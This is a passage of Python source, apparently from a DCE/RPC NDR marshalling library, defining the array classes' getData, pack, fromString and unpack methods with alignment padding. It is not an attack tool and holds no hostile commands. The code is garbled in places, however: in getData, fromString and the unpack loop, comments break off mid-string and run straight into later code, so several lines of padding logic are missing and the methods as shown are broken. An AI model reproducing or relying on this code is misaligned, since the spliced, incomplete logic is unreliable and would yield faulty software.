align:\n align = tmpAlign\n return align\n\n def getData(self, soFar = 0):\n data = b''\n soFar0 = soFar\n for fieldName, fieldTypeOrClass in self.structure:\n try:\n if self.isNDR(fieldTypeOrClass) is False:\n # If the item is not NDR (e.g. ('MaximumCount', ' 0:\n soFar += pad\n data += b'\\xca'*pad\n\n res = self.pack(fieldName, fieldTypeOrClass, soFar)\n data += res\n soFar = soFar0 + len(data)\n except Exception as e:\n LOG.error(str(e))\n LOG.error(\"Error packing field '%s | %s' in %s\" % (fieldName, fieldTypeOrClass, self.__class__))\n raise\n\n return data\n\n def pack(self, fieldName, fieldTypeOrClass, soFar = 0):\n # array specifier\n two = fieldTypeOrClass.split('*')\n if len(two) == 2:\n answer = b''\n if self.isNDR(self.item):\n item = ':'\n dataClass = self.item\n self.fields['_tmpItem'] = dataClass(isNDR64=self._isNDR64)\n else:\n item = self.item\n dataClass = None\n self.fields['_tmpItem'] = item\n\n for each in (self.fields[fieldName]):\n pad = self.calculatePad(self.item, len(answer)+soFar)\n if pad > 0:\n answer += b'\\xdd' * pad\n if dataClass is None:\n if item == 'c' and PY3 and isinstance(each, int):\n # Special case when dealing with PY3, here we have an integer we need to convert\n each = bytes([each])\n answer += pack(item, each)\n else:\n answer += each.getData(len(answer)+soFar)\n\n if dataClass is not None:\n for each in self.fields[fieldName]:\n if isinstance(each, NDRCONSTRUCTEDTYPE):\n answer += each.getDataReferents(len(answer)+soFar)\n answer += each.getDataReferent(len(answer)+soFar)\n\n del(self.fields['_tmpItem'])\n if isinstance(self, NDRUniConformantArray) or isinstance(self, NDRUniConformantVaryingArray):\n # First field points to a field with the amount of items\n self.setArraySize(len(self.fields[fieldName]))\n else:\n self.fields[two[1]] = len(self.fields[fieldName])\n\n return answer\n else:\n return NDRCONSTRUCTEDTYPE.pack(self, fieldName, fieldTypeOrClass, soFar)\n\n def fromString(self, data, offset=0):\n offset0 = offset\n for fieldName, fieldTypeOrClass in self.commonHdr+self.structure:\n try:\n if self.isNDR(fieldTypeOrClass) is False:\n # If the item is not NDR (e.g. ('MaximumCount', ' 0:\n soFarItems +=pad\n if dataClassOrCode is None:\n nsofar = soFarItems + calcsize(item)\n answer.append(unpack_from(item, data, offset+soFarItems)[0])\n else:\n itemn = dataClassOrCode(isNDR64=self._isNDR64)\n size = itemn.fromString(data, offset+soFarItems)\n answer.append(itemn)\n nsofar += size + pad\n numItems -= 1\n soFarItems = nsofar\n\n if dataClassOrCode is not None and isinstance(dataClassOrCode(), NDRCONSTRUCTEDTYPE):\n # We gotta go over again, asking for the referents\n answer2 = []\n for itemn in answer:\n size = itemn.fromStringReferents(data, soFarItems+offset)\n soFarItems += size\n size = itemn.fromStringReferent(data, soFarItems+offset)\n soFarItems += size\n answer2.append(itemn)\n answer = answer2\n del answer2\n\n del(self.fields['_tmpItem'])\n\n self.fields[fieldName] = answer\n return soFarItems + offset - offset0\n else:\n return NDRCONSTRUCTEDTYPE.unpack(self, fieldName, fieldTypeOrClass, data, offset)\n\nclass NDRUniFixedArray(NDRArray):\n structure = (\n ('Data',':'),\n )\n\n# Uni-dimensional Conformant Arrays\nclass NDRUniConformantArray(NDRArray):\n item = 'c'\n structure = (\n #('MaximumCount', '